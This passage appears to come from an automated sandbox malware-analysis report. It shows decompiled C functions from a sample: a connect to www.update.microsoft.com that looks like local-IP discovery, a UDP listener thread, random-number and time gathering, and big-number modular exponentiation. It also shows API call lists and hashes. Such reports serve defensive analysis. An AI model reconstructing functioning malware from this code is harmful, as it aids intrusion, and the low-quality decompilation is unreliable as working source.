                                                                                  0x0040b914
                                                                                  0x0040b914
                                                                                  0x0040b924
                                                                                  0x0040b928
                                                                                  0x0040b931
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040b939
                                                                                  0x0040b941
                                                                                  0x0040b94e
                                                                                  0x0040b943
                                                                                  0x0040b946
                                                                                  0x0040b946
                                                                                  0x0040b95b
                                                                                  0x0040b95f
                                                                                  0x0040b965
                                                                                  0x0040b96c
                                                                                  0x0040b972
                                                                                  0x0040b97d
                                                                                  0x0040b97d
                                                                                  0x0040b986
                                                                                  0x0040b98f
                                                                                  0x0040b98f
                                                                                  0x0040b96c
                                                                                  0x0040b994
                                                                                  0x0040b9a3
                                                                                  0x0040b9af
                                                                                  0x0040b9bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040b9a3
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040B902
                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B928
                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B95F
                                                                                  • GetTickCount.KERNEL32 ref: 0040B974
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B994
                                                                                  • GetTickCount.KERNEL32 ref: 0040B99A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                  • String ID:
                                                                                  • API String ID: 107502007-0
                                                                                  • Opcode ID: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction ID: b5ebabbcfa87b5d5b6093c606dafa0a0568610fd24292d9ee39f828ceab0bc2d
                                                                                  • Opcode Fuzzy Hash: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction Fuzzy Hash: 2831F0B4900209DFCB04DFA8D948BEE7BB1FF44315F108669E915A3390D7749A90CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 16%
                                                                                  			E00409880() {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				short _v30;
                                                                                  				short _v34;
                                                                                  				short _v38;
                                                                                  				intOrPtr _v40;
                                                                                  				short _v42;
                                                                                  				char _v44;
                                                                                  				char _v48;
                                                                                  				intOrPtr _t28;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				_v8 = 0xffffffff;
                                                                                  				_v24 = 0;
                                                                                  				_v22 = 0;
                                                                                  				_v18 = 0;
                                                                                  				_v14 = 0;
                                                                                  				_v10 = 0;
                                                                                  				_v24 = 2;
                                                                                  				__imp__#9(0x50);
                                                                                  				_v22 = 0;
                                                                                  				_t28 = E00409840("www.update.microsoft.com");
                                                                                  				_v20 = _t28;
                                                                                  				__imp__#23(2, 1, 0);
                                                                                  				_v28 = _t28;
                                                                                  				if(_v28 != 0xffffffff) {
                                                                                  					_t30 =  &_v24;
                                                                                  					__imp__#4(_v28, _t30, 0x10);
                                                                                  					if(_t30 == 0) {
                                                                                  						_v44 = 0;
                                                                                  						_v42 = 0;
                                                                                  						_v38 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v48 = 0x10;
                                                                                  						__imp__#6(_v28,  &_v44,  &_v48);
                                                                                  						_v8 = _v40;
                                                                                  					}
                                                                                  					E00409940(_v28);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}




















                                                                                  0x00409886
                                                                                  0x0040988f
                                                                                  0x00409895
                                                                                  0x00409898
                                                                                  0x0040989b
                                                                                  0x0040989e
                                                                                  0x004098a7
                                                                                  0x004098ad
                                                                                  0x004098b3
                                                                                  0x004098bc
                                                                                  0x004098c4
                                                                                  0x004098cd
                                                                                  0x004098d3
                                                                                  0x004098da
                                                                                  0x004098de
                                                                                  0x004098e6
                                                                                  0x004098ee
                                                                                  0x004098f2
                                                                                  0x004098f8
                                                                                  0x004098fb
                                                                                  0x004098fe
                                                                                  0x00409901
                                                                                  0x00409905
                                                                                  0x00409918
                                                                                  0x00409921
                                                                                  0x00409921
                                                                                  0x00409928
                                                                                  0x0040992d
                                                                                  0x00409936

                                                                                  APIs
                                                                                  • htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409840: inet_addr.WS2_32(004098C1), ref: 0040984A
                                                                                    • Part of subcall function 00409840: gethostbyname.WS2_32(?), ref: 0040985D
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  Strings
                                                                                  • www.update.microsoft.com, xrefs: 004098B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                  • String ID: www.update.microsoft.com
                                                                                  • API String ID: 4063137541-1705189816
                                                                                  • Opcode ID: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction ID: 4856549373dc0ba92a891a61f9ce0befa44decce286b311d22d51fdce19958fb
                                                                                  • Opcode Fuzzy Hash: 41d3bc95c2ae44e72b32e24321ad9851a133240d3f3aeb102b77493bcdced1bd
                                                                                  • Instruction Fuzzy Hash: A121F9B5E102099BCB04DFF8D946AEEBBB5AF08310F10816DE519F3390E7745A45CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 22%
                                                                                  			E0040E110(void* __edi) {
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				char _v28;
                                                                                  				void* __ebx;
                                                                                  				void* _t15;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t27 = __edi;
                                                                                  				_t24 = E00408E40(0x24);
                                                                                  				 *_t24 = 0x756470;
                                                                                  				 *(_t24 + 4) = 1;
                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                  				__imp__#23(2, 2, 0x11);
                                                                                  				 *(_t24 + 8) = _t15;
                                                                                  				if(_t15 == 0xffffffff) {
                                                                                  					E0040E0A0(_t24, __edi);
                                                                                  					_t24 = 0;
                                                                                  				}
                                                                                  				if(_t24 == 0) {
                                                                                  					L6:
                                                                                  					return _t24;
                                                                                  				} else {
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                  					if(2 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                  						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040DE70, _t24, 0, 0);
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						E0040E0A0(_t24, _t27);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}












                                                                                  0x0040e110
                                                                                  0x0040e122
                                                                                  0x0040e128
                                                                                  0x0040e12e
                                                                                  0x0040e135
                                                                                  0x0040e141
                                                                                  0x0040e144
                                                                                  0x0040e14a
                                                                                  0x0040e150
                                                                                  0x0040e152
                                                                                  0x0040e157
                                                                                  0x0040e157
                                                                                  0x0040e15b
                                                                                  0x0040e1ba
                                                                                  0x0040e1c0
                                                                                  0x0040e15d
                                                                                  0x0040e15f
                                                                                  0x0040e163
                                                                                  0x0040e167
                                                                                  0x0040e16b
                                                                                  0x0040e17b
                                                                                  0x0040e185
                                                                                  0x0040e18e
                                                                                  0x0040e1ae
                                                                                  0x0040e1b7
                                                                                  0x00000000
                                                                                  0x0040e190
                                                                                  0x0040e190
                                                                                  0x0040e19b
                                                                                  0x0040e19b
                                                                                  0x0040e18e

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040E185
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNEL32 ref: 0040E1B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3943618503-0
                                                                                  • Opcode ID: 56d3525a3f54b9deeef16c4675a904cfe2f734bb61d8ed3d0d6a544bc60089b6
                                                                                  • Instruction ID: 22c9fd0d58bb21ad2c775b164571bc0b545b0ff679c75b8c31fe2abd1e05f37e
                                                                                  • Opcode Fuzzy Hash: 56d3525a3f54b9deeef16c4675a904cfe2f734bb61d8ed3d0d6a544bc60089b6
                                                                                  • Instruction Fuzzy Hash: E1119170640300AFE7509FB4DC86B5B7AE0EF48710F54897AFA58DE2D2E6F8D844875A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040AB50(void* __ecx, BYTE* _a4, int _a8) {
                                                                                  				long* _v8;
                                                                                  				long** _t6;
                                                                                  
                                                                                  				_t6 =  &_v8;
                                                                                  				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx);
                                                                                  				if(_t6 != 0) {
                                                                                  					CryptGenRandom(_v8, _a8, _a4);
                                                                                  					return CryptReleaseContext(_v8, 0);
                                                                                  				}
                                                                                  				return _t6;
                                                                                  			}





                                                                                  0x0040ab5f
                                                                                  0x0040ab63
                                                                                  0x0040ab6b
                                                                                  0x0040ab79
                                                                                  0x00000000
                                                                                  0x0040ab85
                                                                                  0x0040ab8e

                                                                                  APIs
                                                                                  • CryptAcquireContextW.ADVAPI32(0040688C,00000000,00000000,00000001,F0000040,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB63
                                                                                  • CryptGenRandom.ADVAPI32(0040688C,?,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB79
                                                                                  • CryptReleaseContext.ADVAPI32(0040688C,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1815803762-0
                                                                                  • Opcode ID: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction ID: 1452194909b8924a7c7626270c55186fff6dc5d04cba850d0a96534bec71c57f
                                                                                  • Opcode Fuzzy Hash: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction Fuzzy Hash: 03E09275600308BBDB14CBE1EC49F9A777CAB08740F108154BB0997280DAB1EA40C7A8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 37%
                                                                                  			E0040C210() {
                                                                                  				void* _v12;
                                                                                  				char _v16;
                                                                                  
                                                                                  				NtQuerySystemTime( &_v12);
                                                                                  				__imp__RtlTimeToSecondsSince1980( &_v12,  &_v16);
                                                                                  				return _v16;
                                                                                  			}





                                                                                  0x0040c21a
                                                                                  0x0040c228
                                                                                  0x0040c234

                                                                                  APIs
                                                                                  • NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                  • RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Time$QuerySecondsSince1980System
                                                                                  • String ID:
                                                                                  • API String ID: 1987401769-0
                                                                                  • Opcode ID: 824b9fd83ef3e9a4173328e3f8dbc040884a1b9c0466d9dd7e8dc2bdfcb6f9cc
                                                                                  • Instruction ID: d42e4d7b3755e1ac49109ca54fd3a4c3ae9de7c477aba9397811212140ea7005
                                                                                  • Opcode Fuzzy Hash: 824b9fd83ef3e9a4173328e3f8dbc040884a1b9c0466d9dd7e8dc2bdfcb6f9cc
                                                                                  • Instruction Fuzzy Hash: 12D0C779C0010DBBCB00DBE4E84DCDDB77CEB44201F0086D5ED15A3150EAB06A58CBD5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 72%
                                                                                  			E00402E90(void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				signed int _v28;
                                                                                  				signed int _v32;
                                                                                  				signed int _v36;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				signed int _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				signed int _v60;
                                                                                  				signed int _v64;
                                                                                  				intOrPtr _v580;
                                                                                  				unsigned int _v584;
                                                                                  				signed int _v588;
                                                                                  				intOrPtr _v592;
                                                                                  				intOrPtr _t249;
                                                                                  				signed int _t260;
                                                                                  				signed int _t282;
                                                                                  				signed int _t302;
                                                                                  				signed int _t311;
                                                                                  				signed int _t317;
                                                                                  				signed int _t329;
                                                                                  				signed int _t334;
                                                                                  				signed int _t370;
                                                                                  				unsigned int _t377;
                                                                                  				signed int _t389;
                                                                                  				signed int _t416;
                                                                                  				signed int _t425;
                                                                                  				signed int _t433;
                                                                                  				unsigned int _t441;
                                                                                  				signed int _t443;
                                                                                  				signed int _t445;
                                                                                  				signed int _t446;
                                                                                  				signed int _t448;
                                                                                  				signed int _t449;
                                                                                  				void* _t463;
                                                                                  				void* _t464;
                                                                                  				void* _t465;
                                                                                  				void* _t470;
                                                                                  				void* _t471;
                                                                                  				void* _t472;
                                                                                  				void* _t477;
                                                                                  
                                                                                  				_t341 = _a12;
                                                                                  				_t249 = E00402290(_a12, _a20);
                                                                                  				_t465 = _t464 + 8;
                                                                                  				_v592 = _t249;
                                                                                  				if(_v592 != 0) {
                                                                                  					__eflags = _v592 - 1;
                                                                                  					if(_v592 != 1) {
                                                                                  						_v28 = 0;
                                                                                  						while(1) {
                                                                                  							__eflags = _v28 - 8;
                                                                                  							if(_v28 >= 8) {
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags = _v28 - 0x20;
                                                                                  							if(_v28 >= 0x20) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t341 = _v28;
                                                                                  							__eflags =  *((intOrPtr*)(0x4143a4 + _t341 * 4)) - _v592;
                                                                                  							if( *((intOrPtr*)(0x4143a4 + _t341 * 4)) <= _v592) {
                                                                                  								_t334 = _v28 + 1;
                                                                                  								__eflags = _t334;
                                                                                  								_v28 = _t334;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v28 - 1;
                                                                                  						if(__eflags > 0) {
                                                                                  							_v44 = _a20 << 1;
                                                                                  							_v48 = E00401400(_t341, _v44);
                                                                                  							_v52 = E00401400(_v44, _v44);
                                                                                  							_v20 = E00401400(_v44, _v44);
                                                                                  							_v16 = E00401400(_v44, _v44);
                                                                                  							_v580 = _a8;
                                                                                  							E00402950(_v580, __eflags, _v20, _v580, _v580, _a16, _a20);
                                                                                  							_t470 = _t465 + 0x24;
                                                                                  							_v64 = 1 << _v28 - 1;
                                                                                  							_v24 = 1;
                                                                                  							while(1) {
                                                                                  								_t347 = _v24;
                                                                                  								__eflags = _v24 - _v64;
                                                                                  								if(_v24 >= _v64) {
                                                                                  									break;
                                                                                  								}
                                                                                  								 *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)) = E00401400(_t347, _v44);
                                                                                  								E00402310( *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)),  *((intOrPtr*)(_t463 + _v24 * 4 - 0x244)), _a20);
                                                                                  								_t477 = _t470 + 0x10;
                                                                                  								do {
                                                                                  									E00401960(_v48, _v20,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _a20);
                                                                                  									E00401BD0(__eflags, _v52,  *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v48, _a20 << 1, _a16, _a20);
                                                                                  									_t477 = _t477 + 0x28;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								_t329 = _v24 + 1;
                                                                                  								__eflags = _t329;
                                                                                  								_v24 = _t329;
                                                                                  							}
                                                                                  							_v56 = 1;
                                                                                  							_t260 = E00402250(_a12, _a20);
                                                                                  							_t471 = _t470 + 8;
                                                                                  							_v588 = _t260;
                                                                                  							_v40 = 0x80000000;
                                                                                  							while(1) {
                                                                                  								__eflags = _v40;
                                                                                  								if(_v40 <= 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t449 = _v588;
                                                                                  								_t317 = _a12;
                                                                                  								__eflags =  *(_t317 + _t449 * 4 - 4) & _v40;
                                                                                  								if(( *(_t317 + _t449 * 4 - 4) & _v40) == 0) {
                                                                                  									_t389 = _v40 >> 1;
                                                                                  									__eflags = _t389;
                                                                                  									_v40 = _t389;
                                                                                  									continue;
                                                                                  								}
                                                                                  								break;
                                                                                  							}
                                                                                  							_v12 = 0;
                                                                                  							_v8 = 0;
                                                                                  							_v36 = 0;
                                                                                  							while(1) {
                                                                                  								__eflags = _v588;
                                                                                  								if(_v588 == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								__eflags = _v56;
                                                                                  								if(_v56 != 0) {
                                                                                  									L29:
                                                                                  									__eflags = _v8;
                                                                                  									if(_v8 != 0) {
                                                                                  										__eflags = _v12;
                                                                                  										if(_v12 > 0) {
                                                                                  											_t433 = _v12 - 1;
                                                                                  											__eflags = _t433;
                                                                                  											_v12 = _t433;
                                                                                  										}
                                                                                  										L52:
                                                                                  										__eflags = _v8;
                                                                                  										if(_v8 == 0) {
                                                                                  											do {
                                                                                  												L58:
                                                                                  												__eflags = _v40 - 1;
                                                                                  												if(_v40 != 1) {
                                                                                  													_t425 = _v40 >> 1;
                                                                                  													__eflags = _t425;
                                                                                  													_v40 = _t425;
                                                                                  												} else {
                                                                                  													_v40 = 0x80000000;
                                                                                  													_v588 = _v588 - 1;
                                                                                  												}
                                                                                  												__eflags = 0;
                                                                                  											} while (0 != 0);
                                                                                  											continue;
                                                                                  										}
                                                                                  										__eflags = _v12 - 1;
                                                                                  										if(_v12 >= 1) {
                                                                                  											goto L58;
                                                                                  										}
                                                                                  										__eflags = _v56;
                                                                                  										if(_v56 == 0) {
                                                                                  											do {
                                                                                  												E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                  												E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                  												_t471 = _t471 + 0x28;
                                                                                  												__eflags = 0;
                                                                                  											} while (0 != 0);
                                                                                  											L57:
                                                                                  											_v8 = 0;
                                                                                  											_v12 = 0;
                                                                                  											goto L58;
                                                                                  										}
                                                                                  										E00402310(_v36, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                  										_t471 = _t471 + 0xc;
                                                                                  										_v56 = 0;
                                                                                  										goto L57;
                                                                                  									}
                                                                                  									_t302 = _v588;
                                                                                  									_t370 = _a12;
                                                                                  									__eflags =  *(_t370 + _t302 * 4 - 4) & _v40;
                                                                                  									if(( *(_t370 + _t302 * 4 - 4) & _v40) == 0) {
                                                                                  										L49:
                                                                                  										goto L52;
                                                                                  									}
                                                                                  									_v8 = 1;
                                                                                  									_v60 = _v40;
                                                                                  									_v32 = _v588;
                                                                                  									_v584 = 1;
                                                                                  									_v24 = 0;
                                                                                  									while(1) {
                                                                                  										__eflags = _v24 - _v28 - 1;
                                                                                  										if(_v24 >= _v28 - 1) {
                                                                                  											break;
                                                                                  										} else {
                                                                                  											goto L34;
                                                                                  										}
                                                                                  										do {
                                                                                  											L34:
                                                                                  											__eflags = _v60 - 1;
                                                                                  											if(_v60 != 1) {
                                                                                  												_t443 = _v60 >> 1;
                                                                                  												__eflags = _t443;
                                                                                  												_v60 = _t443;
                                                                                  											} else {
                                                                                  												_v60 = 0x80000000;
                                                                                  												_v32 = _v32 - 1;
                                                                                  											}
                                                                                  											__eflags = 0;
                                                                                  										} while (0 != 0);
                                                                                  										_v584 = _v584 << 1;
                                                                                  										__eflags = _v32;
                                                                                  										if(_v32 != 0) {
                                                                                  											_t446 = _v32;
                                                                                  											_t311 = _a12;
                                                                                  											__eflags =  *(_t311 + _t446 * 4 - 4) & _v60;
                                                                                  											if(( *(_t311 + _t446 * 4 - 4) & _v60) != 0) {
                                                                                  												_t448 = _v584 | 0x00000001;
                                                                                  												__eflags = _t448;
                                                                                  												_v584 = _t448;
                                                                                  											}
                                                                                  										}
                                                                                  										_t445 = _v24 + 1;
                                                                                  										__eflags = _t445;
                                                                                  										_v24 = _t445;
                                                                                  									}
                                                                                  									_v12 = _v28 - 1;
                                                                                  									while(1) {
                                                                                  										__eflags = _v12;
                                                                                  										if(_v12 <= 0) {
                                                                                  											break;
                                                                                  										}
                                                                                  										__eflags = _v584 & 0x00000001;
                                                                                  										if((_v584 & 0x00000001) == 0) {
                                                                                  											_v12 = _v12 - 1;
                                                                                  											_t441 = _v584 >> 1;
                                                                                  											__eflags = _t441;
                                                                                  											_v584 = _t441;
                                                                                  											continue;
                                                                                  										}
                                                                                  										break;
                                                                                  									}
                                                                                  									_t377 = _v584 >> 1;
                                                                                  									__eflags = _t377;
                                                                                  									_v36 = _t377;
                                                                                  									goto L49;
                                                                                  								} else {
                                                                                  									goto L28;
                                                                                  								}
                                                                                  								do {
                                                                                  									L28:
                                                                                  									E00401F80(_v48, _v16, _a20);
                                                                                  									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                  									_t471 = _t471 + 0x24;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								goto L29;
                                                                                  							}
                                                                                  							__eflags = _v8;
                                                                                  							if(_v8 == 0) {
                                                                                  								L67:
                                                                                  								E00402310(_a4, _a4, _v16, _a20);
                                                                                  								_t472 = _t471 + 0xc;
                                                                                  								do {
                                                                                  									__eflags = _v16;
                                                                                  									if(_v16 != 0) {
                                                                                  										E00402350(_v16, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v16);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								do {
                                                                                  									__eflags = _v20;
                                                                                  									if(_v20 != 0) {
                                                                                  										E00402350(_v20, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v20);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								do {
                                                                                  									__eflags = _v48;
                                                                                  									if(_v48 != 0) {
                                                                                  										E00402350(_v48, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v48);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								do {
                                                                                  									__eflags = _v52;
                                                                                  									if(_v52 != 0) {
                                                                                  										E00402350(_v52, _v44);
                                                                                  										_t472 = _t472 + 8;
                                                                                  									}
                                                                                  									E00401430( &_v52);
                                                                                  									_t472 = _t472 + 4;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								_v24 = 1;
                                                                                  								while(1) {
                                                                                  									__eflags = _v24 - _v64;
                                                                                  									if(_v24 >= _v64) {
                                                                                  										break;
                                                                                  									} else {
                                                                                  										goto L83;
                                                                                  									}
                                                                                  									do {
                                                                                  										L83:
                                                                                  										_t416 = _v24;
                                                                                  										__eflags =  *(_t463 + _t416 * 4 - 0x240);
                                                                                  										if( *(_t463 + _t416 * 4 - 0x240) != 0) {
                                                                                  											E00402350( *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v44);
                                                                                  											_t472 = _t472 + 8;
                                                                                  										}
                                                                                  										E00401430(_t463 + _v24 * 4 - 0x240);
                                                                                  										_t472 = _t472 + 4;
                                                                                  										__eflags = 0;
                                                                                  									} while (0 != 0);
                                                                                  									_t282 = _v24 + 1;
                                                                                  									__eflags = _t282;
                                                                                  									_v24 = _t282;
                                                                                  								}
                                                                                  								__eflags = 0;
                                                                                  								return 0;
                                                                                  							}
                                                                                  							__eflags = _v56;
                                                                                  							if(_v56 == 0) {
                                                                                  								do {
                                                                                  									E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                  									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                  									_t471 = _t471 + 0x28;
                                                                                  									__eflags = 0;
                                                                                  								} while (0 != 0);
                                                                                  								goto L67;
                                                                                  							}
                                                                                  							E00402310(_v16, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                  							_t471 = _t471 + 0xc;
                                                                                  							_v56 = 0;
                                                                                  							goto L67;
                                                                                  						}
                                                                                  						return E00402A00(__eflags, _a4, _a8, _a12, _a16, _a20);
                                                                                  					}
